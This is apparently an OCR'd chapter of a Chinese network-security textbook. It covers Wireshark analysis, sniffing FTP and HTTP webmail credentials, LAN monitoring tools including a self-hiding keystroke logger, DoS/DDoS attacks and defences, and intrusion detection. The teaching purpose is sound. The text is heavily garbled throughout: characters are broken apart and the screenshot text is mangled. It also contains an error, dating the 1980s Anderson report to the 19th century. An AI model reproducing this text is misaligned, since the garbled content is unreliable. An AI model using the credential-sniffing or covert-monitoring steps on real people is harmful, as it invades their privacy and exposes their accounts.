田 Internet protocol Version 4, Src: 10.230.10.227, Dst: 10.234.0.79 

加 Transmission Control Protocol, Src Port: 3389, Dst Port: 61343, Seq: 1, Ack: 1, Len: 1460 

TPKT - ISO on TCP - RFC1006 








2: V0. 加 
@ PR ce copteroorersy Flo ee epiayed 776 (100. 006) ~ [pon Detar 





图 3-25 Wireshark 分 析 数 据 包 
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分 析 数 据 包 有 三 个 步骤 : 选择 数据 包 、 分 析 协 议 、 分 析 包 数据 内 容 。 

(1) 选择 数据 包 。 每 次 捕获 的 数据 包 的 数量 很 多 。 应 该 先 根 据 时 间 、 地 址 、 协 议 . 具 体 
信息 等 对 需要 的 数据 进行 简单 的 手动 筛选 , 选 出 所 要 分 析 的 数据 包 。 例 如 ,ping 命令 嗅 探 到 
的 是 ICMP 协议 。 

(2) 分 析 协 议 。 在 协议 分 析 窗 中 直接 获得 的 信息 是 帧 头 .IP 头 、TCP 头 和 应 用 层 协议 
中 的 内 容 , 如 MAC 地 址 IP 地 址 、 端 口号 和 TCP 的 标志 位 等 。 另 外 ,Wireshark 还 会 给 出 部 
分 协议 的 一 些 摘要 信息 ,可 以 在 大 量 的 数据 中 选取 需要 的 部 分 ,如 图 3-26 所 示 。 
















200 17.550037 10. 234.0.79 10.230.10.227 
201 17.550162 10.230.10.227 10.234.0.79 
204 18.551559 10.234.0.79. 区 230.10.227 











74 Echo hn | 
74 Fchn fninn 


0 ose oe oe oo = IG pit: Individal address (Cunicast) 
Type: “IPv4 (Ox0800) 
日 Internet Protocol Version 4, Src: 10.230.10.227, Dst: 10.234.0.79 
0100 .... = Version: 4 
.».. 0101 = Header Length: 20 bytes (5) 
田 Differentiated Services Field: Ox00 (DSCP: C50, ECN: Not-ECT) 
Total Length: 60 













Identification: 0x2f54 (12116) 
田 Flags: 0x00 
Fragment offset: 0 
Time to 1ive: 128 
Protoco1: ICMP (1) 
Header checksum: 0x0000 [validation disabled] 
[Header checksum status: Unverified] 
Ource: 10.230.10.227 








[Destination GeoIP: Unknown] 
日 Internet .Control Message Protocol 






S99 45 00 








0010 00 3c 2f 54 00 00 80 0 a eb 0a e3 0a ea saRATooss wsvesss 
0020 00 4f 00 00 55 59 00 01 00 02 61 62 63 64 65 66 .0..UY.. ..abcdef 
0030 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 ghijk lmn oparstuy 
0040 77 61 62 63 64 65 66 67 68 69 wabcdefg hi 





图 3-26 ”Wireshark 分 析 协 议 


(3) 分 析 数 据 包 内 容 。 这 里 所 说 的 数据 包 其 实 是 指 捕获 的 一 个 数据 帧 。 数 据 是 经 过 封 
进行 传输 的 。 一 次 完整 的 嗅 探 过 程 并 不 是 只 分 析 一 个 数据 包 , 可 能 是 在 几 十 万 个 数据 包 
中 找 出 有 用 的 几 个 或 几 十 个 来 分 析 。 


1a. Wireshark 的 应 用 举例 


(1) 用 Wireshark 嗅 探 FTP 服务 ,并 获得 FTP 登录 的 用 户 名 和 密码 。 由 于 FTP 中 的 
数据 都 是 明文 传输 的 ,用 Wireshark 可 以 捕获 登录 信息 。 启 动 Wireshark 并 开始 嗅 探 , 手 动 
登录 FTP 操作 ,再 停止 嗅 探 。 如 图 3-27 所 示 , 可 以 看 到 ,捕获 的 用 户 名 为 up, 密码 是 
upload。 通 过 数据 包 的 捕获 也 能 更 清楚 FTP 的 工作 过 程 。 图 3-27 中 使 用 了 过 滤器 来 定位 。 

如 果 用 户 名 为 匿名 (anonymous) ,密码 为 空 或 是 用 户 邮 箱 ,一 般 密 码 默 认为 User@ 。 


上 一 一- 一 



















了 | Presim -aee ry see 











361 16.728432 10.230.0.30 10.230.10.227 88 Response: 320-\273\266\323\255\271\342\30I\33 


363 16. 728979 10.230.0.30 10.230.10.227 FTP 864 Response: 220-\241\255\241\255\241\255\241\25| 
365 16. 729066 10.230.10.227 10.230.0.30 FTP 63 Request: USER Up 

366 16.733616 10.230.0.30 10.230.10.227 FTP 90 nesponse: 331 User name okay, need password. 
368 16.733681 10.230.10.227 10.230.0.30 FTP 67 Request: PASS upload 

369 16.734396 10.230.0.30 10.230.10.227 FTP 84 Response: 230 User 1099ed in，proceed、 





I ‘4, Src: 10,230,10,227, 0st: 10. 230.0 30 
BTransmission Control Protocol, Src Por 
日 Fi1e Transfer prorocol (FTP) 





Request command: PASS 
Request arg: upload 





(414 悦 了 
ool0 00354bba40008006 00 00 0a e6 0a e3 0ae6 
0020 00 le 13 28 00 15 75 el al 9b 86 e2 05 6b 50 18 
0030 00 fd 20 f4 00 00 BENZENE ENE 
0040 MEE 











图 3-27 FTP 登录 信息 分 析 


(2) 用 Wireshark 嗅 探 Web 邮箱 密码 。 为 了 方便 很 多 人 使 用 Web 邮箱 进行 邮件 的 收 
发 ,由 于 HTTP 是 明文 传送 的 ,所 以 可 以 嗅 探 到 用 户 邮 箱 的 密码 (如 QQ 邮箱 采用 的 是 
HTTPS 传输 不 能 进行 嗅 探 )。 如 图 3-28 所 示 ,用 http. request. method 王 二 POST, 过 滤 出 
所 要 分 析 的 数据 包 , 得 出 用 户 名 和 密码 信息 。 


ilter: [ret ronsest wahea=mosr 相 Expression .. Clear Ayrly Save 


2318 9.711674 10.230.10.227 10.230.0.35 HTTP 926 POST :php HTTP/A.1 (app 
2335 9.791724 10.230.10.227 10.230.0.35 HTTP 835 POST /index.php HTTP/1.1 (appli 
D252 0 RRSTAO 10 I20 10 337 an_o7 A2 12n urre, an4_pmcT linfn nhn HrTOA fann) 





















日 Form ttem: "domain” = “szit.edu.cn" 
Key: domain 
Value: szit.edu.en 

日 Form item: "userpassword" = "adfdfe4536453" 


E 中 E 本 nguagss9 
0360 62 26 75 73 65 72 69 64 3973786265727870 badserid -Subgr 
0370 26 64 5f 6d 61 69 6e 3d 73 7a 69 74 2e 65 64 75 onan Szit.edu 
0380 “EGG 区 

0390 ”SEESIESHESG [a 4 


Packets: 2487 ' Displayed: 3 (0.1%) “Dropped: 0 (0.0%) 





3-28 HTTP 的 Web 邮箱 密码 嗅 探 


PP 3.3.3 其 他 嗅 探 工 具 


i. 影音 神探 


网 上 的 资源 丰富 多 彩 , 比 如 有 动听 的 MP3、 精 彩 的 电影 电视 剧 、 动 漫 Flash 等 ,然而 , 利 

用 常规 的 方法 ,一些 资源 很 难 把 它们 保存 到 本 地 计算 机 再 次 收听 或 观看 。 
音 神探 ?软件 不 仅 能 找 出 隐藏 在 网 页 中 的 媒体 文件 的 网 络 地 址 ,能 让 电影 电视 软件 
上 的 流 媒体 地 址 无 处 通 形 。 该 软件 不 仅 能 找 出 媒体 文件 的 网 络 地 址 ,而 且 还 能 找 出 众多 资 
源 文件 的 网 络 地 址 ,而 且 操作 方法 也 非常 简单 。 影 音 神探 就 是 通过 WinPcap 软件 分 析 和 嗅 
探 经 过 网 卡 的 数据 的 。 当 嗅 探 开 始 时 ,如果 有 数据 流 过 网 卡 ,影音 神探 就 能 分 析出 这 些 数据 


——@ 
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的 文件 格式 以 及 它们 真实 的 网 络 地 址 。 在 默认 设置 下 ,影音 神探 能 嗅 探 出 几 十 种 格式 的 文 
件 , 通 过 自 定义 格式 ,还 可 以 扩展 影音 神探 的 嗅 探 能 力 ,让 影音 神探 嗅 探 出 更 多 的 文件 类 型 。 


有 2. 艾 菲 网 页 侦探 


艾 菲 网 页 侦探 是 一 个 基于 HTTP 协议 的 网 络 嗅 探 器 、 协 议 分 析 器 和 HTTP 文件 重建 
工具 。 它 可 以 捕 提 局 域 网 内 的 含有 HTTP 协议 的 IP 数据 包 , 并 对 其 进行 分 析 , 找 出 符合 过 
滤器 的 那些 HTTP 通信 内 容 。 通 过 它 , 可 以 看 到 网 络 中 的 其 他 人 都 在 浏览 了 哪些 网 页 ,这 
些 网 页 的 内 容 是 什么 。 特 别 适 用 于 企业 主管 对 公司 员工 的 上 网 情况 进行 监控 。 

具体 操作 步骤 如 下 。 

(1) 运行 软件 ,选择 Sniffer->Filter 命令 ,打开 的 Sniffer Filter 对 话 框 ,如 图 3-29 所 示 。 
在 此 对 话 框 中 可 以 设置 缓冲 区 大 小 、 启 动 选项 、 探 测 文件 目标 ,探测 的 计算 机 对 象 等 属性 。 
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WS Static web pages /him hm ml) 
WS Images (pg. peg. oN) 
WS Am other fies (cgi php. kp. css. zp. etc ) 





从 Which host is your snifing target? Any or a specific host 
© Any hosts no matter the location [Defauk) 





Specly ahostIP TREE 
Specily the role of the host chent orhos 
人 As a cien, only sna HTTP conmuricalionsyequested by the host 
be [Dale 
© As a sorver. ordy srifl HTTP communications remponded by the hott 
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图 3-29 网 页 内 容 捕获 属性 设置 


(2) 设置 相关 属性 后 ,返回 主 界面 , 单 击 “ 开 始 ? 按 钮 ,选择 要 查看 的 数据 包 , 可 以 进一步 
查看 相关 的 HTTP 请 求 命令 和 应 答 信 息 。 选 择 Sniffer->~View details 命令 ,可 以 查看 所 选 
数据 包 的 详细 信息 。 

(3) 选择 要 查看 的 数据 包 , 也 可 以 查看 到 HTTP 请 求 头 信息 。 默 认 在 主 界面 的 左下 部 
分 ,如 图 3-30 所 示 。 

在 使 用 艾 菲 网 页 侦探 捕获 下 载 地 址 时 ,不 仅 可 以 捕获 到 引用 页 地 址 ,而 且 可 以 捕获 到 其 
真实 的 下 载 地 址 。 


@— 












GET /api/getversion?uuid=1393381076xl5tinestamp=1393381076 
a ee ye HTTP/1.1 
Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; 














图 3-30 ”捕获 网 页 的 HTTP 请 求 头 信息 





3.4 ”实现 网 络 监控 


Li: 利用 网 络 执法 官 实现 网 络 监控 


“网 络 执法 官 "是 一 款 局 域 网 管理 辅助 软件 ,采用 网 络 底层 协议 ,能 穿 透 各 客户 端 防火 墙 
对 网 络 中 的 每 一 台 主 机 (本 文中 主机 指 各 种 计算 机 、 交 换 机 等 配 有 IP 的 网 络 设备 ) 进 行 监 
控 ; 采用 网 卡号 (MAC) 识 别 用 户 , 可 靠 性 高 ; 软件 本 身 占用 网 络 资源 少 ,对 网 络 没 有 不 良 影 
响 。 软 件 不 需 运 行 于 指定 的 服务 器 ,在 网 内 任 一 人 台 主 机 上 运行 均 可 有 效 监 控 所 有 本 机 连接 
到 的 网 络 (支持 多 网 段 监控 )。 

具体 操作 步骤 如 下 。 

(1) 安装 “网 络 执法 官 "软件 。 

(2) 指定 监控 的 硬件 对 象 和 网 段 范围 ,如 图 3-31 所 示 。 


设置 扫 扣 了 网/Tf 引 








选择 网卡 : [Ntheros ARB1S1 PCIE Gieabit Ethernet Controller 了 ] 
网 上 挤 壕 


Atheros ARBISI PCI-E Gigabit Ethernet Controller 
3 了 网: 站 :te 160.1 10/24 [192 168.1.1 - 192.168.1.254] = 
E10 国有 加 [IEC 


监控 如 下 子 同 及 理 自 - 






192. 168.1,1 ~ 192.168.1 























3-31 设置 监控 范围 


设置 完成 后 ,在 主 界面 中 可 以 看 到 同一 局 域 网 下 的 所 有 用 户 , 可 查看 其 状态 .流量 、IP 
地 址 `MAC 地 址 、 是 否 锁定 、 最 后 上 线 时 间 等 信息 。 使 用 该 软件 可 收集 处 于 同一 局 域 网 内 所 


—® 











:Res 国 
有 主机 的 相关 网 络 信息 。 


(3) 批量 保存 目标 主机 信息 。 主 界面 单 击 "记录 查询 ”选项 卡 , 输 入 起 始 和 结束 IP 地 址 ， 
并 单 击 “ 查 找 ” 按 钮 , 则 可 以 收集 相关 信息 ,并 导出 保存 ,如 图 3-32 所 示 。 








192. 168, 1. 100 Wp/ SZ-IC 2013-12-13 17:15:¢ 
192. 168,1.68 wp /ZK / 5 2013-12-13 17:15;4 
192 168.1.55 2013-12-13 17:15:4 
192 168.1.15 2013-12-13 17:15:4 
192. 168.1.1 2013-12-13 17:15:4 


168.1.102 WORKGBDW / 4LBQDIE. . 2013-12-13 17:1521 


cr 
-ET 


在 类 时 间 : [2013-11-16 11:17 当 
-ie 习 














图 3-32 记录 查询 


(4) 在 “设置 "关键 主机 组 界面 中 ,还 可 以 设置 关键 主机 ,设置 后 可 令 非法 用 户 断 开 
与 关键 主机 的 连接 。 

(5) 权限 设置 。 在 “用 户 ”>“ 权 限 设 置 " 界 面 中 ,选择 一 个 网 卡 权限 。 选 择 “ 受 限 用 户 ， 
若 违 反 以 下 权限 将 被 管理 ” 单 选 按钮 ,并 进行 相关 设置 ,如 图 3-33 所 示 。 






用 户 :Free BC-21-ONer Mm [TPIT TCROUGES CO UD] 
过 该 用 户 权 限 为 系统 二 予 的 默认 权限 ， 时 间 2013-12-13 17:15:00 。 
三 设置 权限 

















对 造反 以 上 权限 的 用 户 ， 格 自动 按 以 下 方式 进行 管理 * 


























三 管理 方式 
厂 卫 冲 实 有 :|[ 9 zz] 
[UE EA E20 
厂 断 开 与 所 有 主机 TCP/T? 这 接 吻 本 机 及 煞 感 主机 外 ) 二 机] 
嘲 制 陋 贴 a GEIP) 保存 取消 
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(6) 禁止 目标 计算 机 访问 网 络 。 在 主 界 面 的 用 户 列表 中 右 击 ,在 打开 的 快捷 菜单 中 选 
择 “ 锁 定 /解锁 ”命令 。 

“网 络 执法 官 " 的 主要 功能 是 依据 管理 员 为 各 主机 限定 的 权限 ,实时 监控 整个 局 域 网 ,并 
自动 对 非法 用 户 进 行 管理 ,可 将 非法 用 户 与 网 络 中 某 些 主机 或 整个 网 络 隔 离 , 而 且 无 论 局 域 
网 中 的 主机 运行 何 种 防火 墙 ,都 不 能 逃避 监控 ,也 不 会 引起 防火 墙 警告 ,提高 了 网 络 的 安全 人性。 


有 2: 利用 Real Spy Monitor 监控 网 络 


Real Spy Monitor 是 一 个 监测 互联 网 和 个 人 计算 机 以 保障 其 安全 的 软件 ,包括 键盘 按 
下 、 网 页 站 点 、 视 窗 开 关 、 程 序 执行 .屏幕 扫描 以 及 文件 的 出 人 等 都 是 其 监控 的 对 象 。 网 络 的 
监视 可 以 记录 的 不 仅 是 网 页 的 浏览 ,还 包含 MSN、AIM、Yahoo Messenger 等 实时 通信 的 软 
件 , 全 部 可 以 留 下 记录 。 此 外 ,直接 在 网 页 上 使 用 邮件 系统 的 Web Mail 内 容 , 包 含 MSN 和 
Hotmail 等 ,也 都 有 详细 的 记录 。 

具体 操作 步骤 如 下 。 

(1) 第 一 次 使 用 时 ,只 须 在 New PassWord 和 Confirm 文本 框 中 输入 新 的 密码 ,而 Old 
PassWord 中 不 需要 输入 。 注 意 设置 的 这 个 密码 千 万 不 能 忘记 ,该 密码 会 在 软件 操作 时 经 常 
用 到 。 

(2) 打开 主 界面 后 ,一 般 要 先 设 置 热 键 , 如 图 3-34 所 示 。 这 是 因为 Real Spy Monitor 在 
运行 时 会 比较 彻底 地 将 自己 隐藏 ,用 户 在 “任务 管理 器 ”等 地 方 看 不 到 该 程序 的 运行 信息 。 
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图 3-34 Real Spy Monitor 运行 主 界面 


(3) 完成 了 基本 设置 后 ,就 可 以 进行 系统 监控 了 。 单 击 Start Monitor 按钮 就 可 以 开始 
监控 了 。 只 要 用 热 键 打开 主 界面 ,就 可 以 看 到 监控 到 的 各 种 信息 。 使 用 比较 频繁 的 主要 有 
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浏览 过 的 网 站 监控 ,键盘 输 入 内 容 监控 ,程序 执行 情况 监控 和 即时 截图 监控 等 。 

一 般 现 在 使 用 上 网 行为 管理 软件 或 设备 来 进行 网 络 的 监控 ,但 价格 比较 昂贵 ,如 深信 服 
上 网 行为 管理 产品 ,具备 专业 的 行为 管理 ,应 用 控制 .流量 管控 、 信 息 管控 ,非法 热点 管控 、 行 
为 分 析 无 线 网 络 管理 等 功能 ,真正 做 到 全 网 全 终端 统一 上 网 行为 管理 。 它 的 特点 如 下 。 

(1) 有 效 防 止 员 工 进行 与 工作 无 关 的 网 络 行为 。 

(2) 提高 带宽 资源 利用 率 。 

(3) 规避 泄密 和 法 规 风险 、 保 障 内 网 数据 安全 。 

(4) 可 视 化 管理 以 及 全 面 管控 无 线 AP 等 。 


| 3.5 ”拒绝 服务 攻击 “| 拒绝 服务 攻击 


. 拒绝 服务 攻击 概述 


拒绝 服务 是 指 通 过 反复 向 某 个 Web 站 点 的 设备 发 送 过 多 的 信息 请 求 , 堵 塞 该 站 点 上 的 
系统 ,导致 无 法 完成 应 有 的 网 络 服务 。 

拒绝 服务 分 为 资源 消耗 型 .配置 修改 型 ,物理 破坏 型 以 及 服务 利用 型 。 

拒绝 服务 攻击 (Denial of Service,DoS) 是 指 黑客 利用 合理 的 服务 请 求 来 占用 过 多 的 服 
务 资源 ,使 合法 用 户 无 法 得 到 服务 的 响应 ,直至 瘫痪 而 停止 提供 正常 的 网 络 服 务 的 攻击 方 
式 。 单 一 的 DoS 是 采用 一 对 一 方式 的 , 当 攻 击 目 标 CPU 速度 低 、 内 存 小 或 者 网 络 带 宽 小 等 
各 项 性 能 指标 不 高 时 , 它 的 效果 是 明显 的 ; 否则 达 不 到 攻击 效果 。 

分 布 式 拒绝 服务 攻击 (Distributed Denial of Service,DDoS) 指 借助 客户 /服务 器 技术 ,将 
网 络 中 多 个 计算 机 联 成 攻击 平台 ,对 目标 发 动 DoS 攻击 ,是 在 传统 的 DoS 攻击 基础 之 上 产 
生 的 一 类 攻击 方式 。 其 攻击 原理 如 图 3-35 所 示 ,是 通过 制造 流量 ,使 被 攻击 的 服务 器 、 网 络 
链 路 或 是 网 络 设备 负载 过 高 ,从 而 导致 系统 崩溃 ,无 法 提供 正常 的 服务 。 









攻击 者 主 控 机 遭受 DDoS 
攻击 的 目标 计算 机 


被 控制 的 计算 机 
3-35 ”DDoS 的 攻击 原理 


DDoS 的 类 型 可 分 带宽 型 攻击 和 应 用 型 攻击 。 前 者 也 称 流量 型 攻击 ,主要 通过 发 出 海量 
数据 包 , 造 成 设备 负载 过 高 ,最 终 导致 网 络 带宽 或 是 设备 资源 耗 尽 。 后 者 主要 利用 TCP 或 
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HTTP 协议 的 某 些 特征 ,通过 持续 占用 有 限 的 资源 ,达到 阻止 目标 设备 无 法 处 理 正常 访问 请 
求 的 目的 。 


12. 常见 的 拒绝 服务 攻击 


常见 DDoS 目的 主要 有 四 种 : 通过 网 络 过 载 干扰 甚至 阻 断 正常 的 网 络 通信 ; 通过 向 服 
务 器 提交 大 量 请 求 , 使 服务 器 超 负 荷 ; 阻 断 某 一 用 户 访问 服务 器 ; 阻 断 某 服务 与 特定 系统 或 
个 人 的 通信 。 常 见 的 几 种 DDoS 包括 以 下 内 容 。 

(1) Flooding 攻击 。Flooding 攻击 将 大 量 看 似 合法 的 TCP .UDP 、ICPM 包 发 送 至 目标 
主机 ,甚至 有 些 攻击 还 利用 源 地 址 伪造 技术 来 绕 过 检测 系统 的 监控 。 

(2) SYN Flood 攻击 。SYN Flood 攻击 是 一 种 黑客 通过 向 服务 端 发 送 虚 假 的 包 以 欺骗 
服务 器 的 做 法 。 这 种 做 法 使 服务 器 必须 开启 自己 的 监听 端口 不 断 等 待 ,也 浪费 了 系统 各 种 
资源 。SYN Flood 的 攻击 原理 ,如 图 3-36 所 示 。 
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图 3-36 ”SYN Flood 攻击 示意 图 


(3) LAND Attack 攻击 。 与 SYN Flood 类 似 , 不 过 在 此 攻击 包 中 的 源 地 址 和 目标 地 址 
都 是 攻击 对 象 的 IP。 会 导致 被 攻击 的 机 器 死 循环 ,最 终 耗 尽 运行 的 系统 资源 死机 ,难以 正常 
运行 。 

(4) ICMP Floods。 是 通过 向 设置 不 当 的 路 由 器 发 送 广播 信息 占用 系统 资源 的 做 法 。 

(5) Application Level Floods。 主 要 是 针对 应 用 软件 层 的 。 它 同样 是 以 大 量 消耗 系统 
资源 为 目的 ,通过 向 IIS 这 样 的 网 络 服务 程序 提出 无 节制 的 资源 申请 来 迫害 正常 的 网 络 
服务 。 


上 3. 拒绝 服务 攻击 检测 与 防范 


主要 检测 DDoS 的 方法 有 两 种 : 根据 异常 情况 分 析 和 使 用 DDoS 检测 工具 。 

通常 ,对 DDoS 的 防范 策略 主要 包括 以 下 内 容 。 

(1) 尽早 发 现 网 络 系统 存在 的 攻击 漏洞 ,及 时 安装 系统 补丁 程序 。 

(2) 在 网 络 安全 管理 方面 .要 经 常 检查 系统 的 物理 环境 ,禁止 那些 不 必要 的 网 络 服 务 。 
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(3) 利用 网 络 安全 设备 (如 防火 墙 ) 等 来 加 固 网 络 的 安全 性 。 


(4) 对 网 络 安全 访问 控制 和 限制 。 与 网 络 服务 提供 商 协 调 ,实现 路 由 访问 控制 和 带宽 
限制 。 

(5) 发 现 正在 遭受 DDoS 时 ,启动 应 付 策略 ,追踪 攻击 包 , 及 时 联系 ISP 和 应 急 组 织 。 

(6) 对 于 潜在 的 DDoS 应 当 及 时 清除 ,以 免 留 下 后 患 。 


3.6 入 侵 检 测 与 防御 系统 概述 





【案例 3-4】 美军 网 络 战 子 司令 部 多 达 541 个 ,未 来 4 年 扩编 4000 人 。 据 日 本 共同 社 
2013 年 6 月 28 日 报道 ,美军 参谋 长 联席 会 议 主席 登 普 西 在 华盛顿 发 表演 讲 时 表示 ,为 强化 
美国 对 网 络 攻 击 的 防御 能 力 ,计划 将 目前 约 900 人 规模 的 网 络 战 司 令 部 在 今后 4 年 扩编 
4000 人 ,为 此 将 投入 230 亿美 元 。 并 指出 ,网 络 攻击 是 2001 年 “9。11” 丽 怖 袭击 以 后 安全 
环境 的 “最 大 变化 ”, 全 球 20 多 个 国家 拥有 网 络 战 部 队 。 


1. 入 侵 检测 系统 的 概念 


1) 入 侵 和 入 侵 检测 的 概念 

入 侵 检测 (Intrusion Detection,ID) 是 指 “ 通 过 对 行为 安全 日 志 或 审计 数据 或 其 他 网 络 
上 可 以 获得 的 信息 进行 操作 ,检测 到 对 系统 的 问 入 或 问 入 的 企图 "(参见 国标 GB/T 18336 一 
2015)。 入 侵 检测 是 防火 墙 的 合理 补充 ,对 于 网 络 系统 出 现 的 攻击 事件 ,可 以 及 时 帮助 监视 、 
应 对 和 告警 ,扩展 了 系统 管理 员 的 安全 管理 能 力 (包括 安全 审计 ,监视 .进攻 识别 和 响应 ) , 提 
高 了 信息 安全 基础 结构 的 完整 性 。 可 以 从 计算 机 网 络 系统 中 的 若干 关键 点 收集 信息 ,并 分 
析 这 些 信息 ,看 看 网 络 中 是 否 有 违反 安全 策略 的 行为 和 遭 到 袭击 的 迹象 。 入 侵 检测 被 认为 
是 防火 墙 之 后 的 第 二 道 安全 闸门 ,在 不 影响 网 络 性 能 的 情况 下 能 对 网 络 进行 监测 ,从 而 提供 
对 内 部 攻击 、 外 部 攻击 和 误 操 作 的 实时 保护 。 

2) 入 侵 检测 系统 的 概念 及 原理 

人 侵 检 测 系统 (Intrusion Detection System,IDS) 是 指 对 入 侵 行 为 自动 进行 检测 、 监 控 
和 分 析 过 程 的 软件 与 硬件 的 组 合 系统 ,是 一 种 自动 监测 信息 系统 内 、 外 入 侵 事 件 的 安全 设 
备 。IDS 通过 从 计算 机 网 络 或 系统 中 的 若干 关键 点 收集 信息 ,并 对 其 进行 分 析 , 从 中 发 现 网 
络 或 系统 中 是 否 有 违反 安全 策略 的 行为 和 遭 到 攻击 迹象 的 一 种 安全 技术 。 

(1) 入 侵 检测 系统 产生 与 发 展 。 在 19 世纪 80 年 代 初 ,美国 人 詹姆斯 . P， 安德森 
(James P. Anderson) 的 一 份 题 为 (计算 机 安全 威胁 监控 与 监视 ) 的 技术 报告 ,首次 详细 阐述 
了 入 侵 检测 的 概念 ,提出 了 利用 审计 跟踪 数据 监视 入 侵 活 动 的 思想 。1990 年 ,加 州 大 学 戴 
维 斯 分 校 的 L. T. Heberlein 等 人 研发 出 了 网 络 安全 监听 NSM(Network Security Monitor) 
系统 。 该 系统 首次 直接 将 网 络 流 作 为 审计 数据 来 源 ,因而 可 以 在 不 将 审计 数据 转换 成 统一 
格式 的 情况 下 监控 异种 主机 。IDS 发 展 史 上 两 大 阵营 : 基于 主机 的 人 侵 检 测 系统 (Hostbased 
Intrusion Detection System,HIDS) 和 基于 网 络 人 侵 检测 系统 (Network Intrusion Detection 
System,NIDS) 形 成 。1988 年 之 后 ,美国 开展 对 分 布 式 人 侵 检测 系统 (Distributed Intrusion 
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Detection System,DIDS) 的 研究 ,将 基于 主机 和 基于 网 络 的 检测 方法 集成 到 一 起 。DIDS 是 
入 侵 检测 系统 历史 上 的 一 个 里 程 碑 式 的 产品 。 

(2) Denning 模型 。1986 年 ,乔治 敦 大 学 的 Dorothy Denning 和 SRI/CSL 的 Peter 
Neumann 研究 出 了 一 个 实时 入 侵 检测 系统 模型 一 一 人 侵 检测 专家 系统 IDES (Intrusion 
Detection Expert System) ,也 称 Denning 模型 。Denning 模型 基于 这 样 一 个 假设 : 由 于 袭击 
者 使 用 系统 的 模式 不 同 于 正常 用 户 的 使 用 模式 ,通过 监控 系统 的 跟踪 记录 ,可 以 识别 袭击 者 
异常 使 用 系统 的 模式 ,从 而 检测 出 袭击 者 违反 系统 安全 性 的 情况 。Denning 模型 独立 于 特 
定 的 系统 平台 、 应 用 环境 、 系 统 弱 点 以 及 入侵 类 型 ,为 构建 入 侵 检测 系统 提供 了 一 个 通用 的 
原理 框架 ,如 图 3-37 所 示 。 该 模型 由 主体 (Subjects) ,审计 记录 (Auditrecords) 等 六 元 组 构 
成 (Subject, Action, Object, Exception-Condition, Resource-Usage, Time-Stamp)。 其 中 : 
Action( 活 动 ) 是 主体 对 目标 的 操作 ,包括 读 、 写 、 登 录 、 退 出 等 ; Exception-Condition( 异 常 条 
件 ) 是 指 系统 对 主体 的 该 活动 的 异常 报告 ,如 违反 系统 读 写 权 限 ; Resource-Usage( 资 源 使 用 
状况 ) 是 系统 的 资源 消耗 情况 ,如 CPU、 内 存 使 用 率 等 ; Time-Stamp( 时 间 戳 ) 是 活动 发 生 时 
间 、 活 动 简 档 (Activity Profile) 、 异 常 记录 (Anomaly Record) ,规则 构成 。 
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图 3-37 入侵 检测 系统 原理 图 


2. 入 侵 检测 系统 的 功能 及 分 类 


1) IDS 基本 结构 

IDS 主要 巾 事件 产生 器 .事件 分 析 器 .事件 数据 库 、 响 应 单元 等 构成 。 其 中 事件 产生 器 
负责 原始 数据 采集 ,并 将 收集 到 的 原始 数据 转换 为 事件 ,向 系统 的 其 他 部 分 提供 此 事件 。 收 
集 的 信息 包括 : 系统 或 网 络 的 日 志文 件 , 网 络 流量 、 系 统 目录 和 文件 的 异常 变化 \ 程 序 执行 
中 的 异常 行为 。 

约 注 意 : 入 侵 检 测 很 大 程度 上 依赖 于 收集 信息 的 可 靠 性 和 正确 性 。 事 件数 据 库 是 存放 
各 种 中 间 和 最 终 数 据 的 地 方 。 响 应 单元 根据 告警 信息 做 出 反应 (四 强烈 反应 ; 切断 连接 、 改 
变 文件 属性 等 ; 加 简单 的 报警 ) 。 事 件 分 析 器 接收 事件 信息 ,对 其 进行 分 析 , 判 断 是 否 为 入 
侵 行为 或 异常 现象 ,最 后 将 判断 的 结果 转变 为 告警 信息 。 

通常 ,分 析 方 法 主要 有 以 下 三 种 。 

(1) 模式 匹配 : 将 收集 到 的 信息 与 已 知 的 网 络 入 侵 和 系统 误 用 模式 数据 库 进行 比较 ,从 
而 发 现 违背 安全 策略 的 行为 。 

(2) 统计 分 析 : 首先 给 系统 对 象 ( 如 用 户 文件 .目录 和 设备 等 ) 创 建 一 个 统计 描述 ,统计 
正常 使 用 时 的 一 些 测量 属性 (如 访问 次 数 、 操 作 失 败 次 数 和 延 时 等 ); 测量 属性 的 平均 值 和 
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偏差 将 被 用 来 与 网 络 、 系 统 的 行为 进行 比较 , 当 网 络 系 统 的 检测 观察 值 在 正常 值 范围 之 外 
时 ,就 可 以 认为 可 能 有 异常 的 入 侵 行为 发 生 , 可 以 进一步 确认 。 

(3) 完整 性 分 析 ( 往 往 用 于 事后 分 析 ) : 主要 关注 某 个 文件 或 对 象 是 否 被 更 改 。 

2) IDS 的 主要 功能 

一 般 IDS 的 主要 功能 如 下 。 

(1) 具有 对 网 络 流量 的 跟踪 与 分 析 功 能 。 跟 踪 用 户 从 进入 网 络 到 退出 网 络 的 所 有 活 
动 ,实时 监测 并 分 析 用 户 在 系统 中 的 活动 状态 。 

(2) 对 已 知 攻击 特征 的 识别 功能 。 识 别 特 类 攻击 ,向 控制 台 报警 ,为 防御 提供 依据 。 

(3) 可 以 对 异常 行为 进行 分 析 、 统 计 与 响应 的 功能 。 分 析 系 统 的 异常 行为 模式 ,统计 异 
常 行为 ,并 对 异常 行为 做 出 响应 。 

(4) 具有 特征 库 的 在 线 升级 功能 。 提 供 在 线 升级 ,实时 更 新 入 侵 特征 库 , 不 断 提高 IDS 
的 入 侵 监 测 能 力 。 

(5) 数据 文件 的 完整 性 检验 功能 。 通 过 检查 关键 数据 文件 的 完整 性 ,识别 并 报告 数据 
文件 的 改动 情况 。 

(6) 自 定义 特征 的 响应 功能 。 定 制 实时 响应 策略 ; 根据 用 户 定义 ,经 过 系统 过 滤 , 对 警 
报 事件 及 时 响应 。 

(7) 系统 漏洞 的 预报 警 功能 。 对 未 发 现 的 系统 漏洞 特征 进行 预报 警 。 

3) IDS 的 主要 分 类 

入 侵 检测 系统 的 分 类 可 以 有 多 种 方法 。 按 照 体系 结构 可 分 为 集中 式 和 分 布 式 。 按 照 工 
作 方 式 可 分 为 离线 检测 和 在 线 检测 。 按 照 所 用 技术 分 为 两 类 : 特征 检测 和 异常 检测 。 按 昭 
检测 对 象 (数据 来 源 ) 分 为 基于 主机 的 入 侵 检 测 系统 HIDS、 基 于 网 络 的 入 侵 检测 系统 NIDS 
和 分 布 式 人 侵 检测 系统 (混合 型 )DIDS。 





上 3. 常用 的 入 侵 检测 方法 


1) 特征 检测 方法 

特征 检测 是 对 已 知 的 攻击 或 人 侵 的 方式 做 出 确定 性 的 描述 ,形成 相应 的 事件 模式 。 当 
